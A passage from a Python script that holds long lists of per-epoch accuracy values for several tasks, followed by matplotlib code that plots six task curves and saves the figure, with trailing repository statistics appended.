0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6455459642253271, 0.6482157159384178, 0.6482157159384178, 0.6482157159384178, 0.6482157159384178, 0.6482157159384178, 0.6482157159384178, 0.6482157159384178, 0.6482157159384178, 0.6482157159384178, 0.6520423600605144, 0.6520423600605144, 0.6520423600605144, 0.6520423600605144, 0.6520423600605144, 0.6520423600605144]
# y6_Mem = [0.22532704458485361, 0.3608614398860906, 0.43926314852718695, 0.5018243303372786, 0.5473880929073596, 0.5903710954881196, 0.647859749043339, 0.6757141585832518, 0.7047254605321706, 0.7232357390762659, 0.7334697873097802, 0.7540268755005785, 0.7652398326955593, 0.7699563940553529, 0.7749399305864555, 0.7780546409183946, 0.7799234671175581, 0.7887336477707573, 0.7849070036486607, 0.7878437305330604, 0.7980777787665747, 0.7938951677493993, 0.7919373498264661, 0.7933612174067811, 0.7933612174067811, 0.666192044139895, 0.6679718786152887, 0.6746462578980155, 0.6733113820414701, 0.6677938951677495, 0.6677938951677495, 0.6677938951677495, 0.6677938951677495, 0.6677938951677495, 0.6677938951677495, 0.6758031503070214, 0.6750912165168639, 0.6886179585298567, 0.6683278455103675, 0.6683278455103675, 0.6683278455103675, 0.6683278455103675, 0.6737563406603186, 0.6737563406603186, 0.680519711666815, 0.680519711666815, 0.680519711666815, 0.680519711666815, 0.680519711666815, 0.680519711666815, 0.680519711666815, 0.680519711666815, 0.680519711666815, 0.680519711666815, 0.6665480110349737, 0.6665480110349737, 0.6665480110349737, 0.6665480110349737, 0.6665480110349737, 0.6665480110349737, 0.6665480110349737, 0.6665480110349737, 0.6665480110349737, 0.6665480110349737, 0.6665480110349737, 0.6665480110349737, 0.6665480110349737, 0.663878259321883, 0.663878259321883, 0.663878259321883, 0.663878259321883, 0.663878259321883, 0.663878259321883, 0.663878259321883, 0.659339681409629, 0.659339681409629, 0.659339681409629, 0.659339681409629, 0.659339681409629, 0.659339681409629, 0.659339681409629, 0.659339681409629, 0.6669929696538222, 0.6669929696538222, 0.6442110883687817, 0.649016641452345, 0.649016641452345, 0.649016641452345, 0.649016641452345, 0.649016641452345, 0.649016641452345, 0.649016641452345, 0.649016641452345, 0.649016641452345, 0.649016641452345, 0.649016641452345, 0.6285485449853163, 0.6285485449853163, 0.6285485449853163, 0.6285485449853163, 0.6285485449853163, 
0.6285485449853163, 0.6285485449853163, 0.6285485449853163, 0.6285485449853163, 0.6215181988075109, 0.6215181988075109, 0.6215181988075109, 0.6215181988075109, 0.6215181988075109, 0.6215181988075109, 0.6215181988075109, 0.6215181988075109, 0.6215181988075109, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6273026608525407, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6197383643321172, 0.6177805464091839, 0.6177805464091839, 0.6177805464091839, 0.6177805464091839, 0.6177805464091839, 0.6177805464091839, 0.6177805464091839, 0.6177805464091839, 0.6177805464091839, 0.6119960843641541, 0.6119960843641541]
# Plot the per-epoch accuracy curves of all six tasks on a single figure.
# Relies on module-level data defined earlier in this file:
#   val      - sequence whose length sets the number of epochs (x-axis)
#   y1..y6   - per-task accuracy series, each the same length as `val`
x = list(range(1, len(val) + 1))  # epochs are 1-indexed
fig = plt.figure()
# One curve per task; legend order below must match this plotting order.
for task_accuracies in (y1, y2, y3, y4, y5, y6):
    plt.plot(x, task_accuracies)
plt.xlabel('Epochs')
plt.ylabel('Accuracy')
plt.legend(["Task 1", "Task 2", "Task 3", "Task 4", "Task 5", "Task 6"])
plt.show()
# NOTE(review): filename says "loss" but the figure shows accuracy, and
# val[199] assumes at least 200 epochs — confirm both against the run setup.
fig.savefig('task_{}_original_loss_{}.png'.format(1, round(val[199], 6)))
| 1,165.788462
| 4,015
| 0.846736
| 6,131
| 60,621
| 8.369271
| 0.067689
| 0.06593
| 0.069457
| 0.131197
| 0.889597
| 0.883672
| 0.883672
| 0.879677
| 0.879677
| 0.873382
| 0
| 0.88627
| 0.051847
| 60,621
| 51
| 4,016
| 1,188.647059
| 0.006455
| 0.992511
| 0
| 0
| 0
| 0
| 0.183099
| 0.065728
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.066667
| 0
| 0.066667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.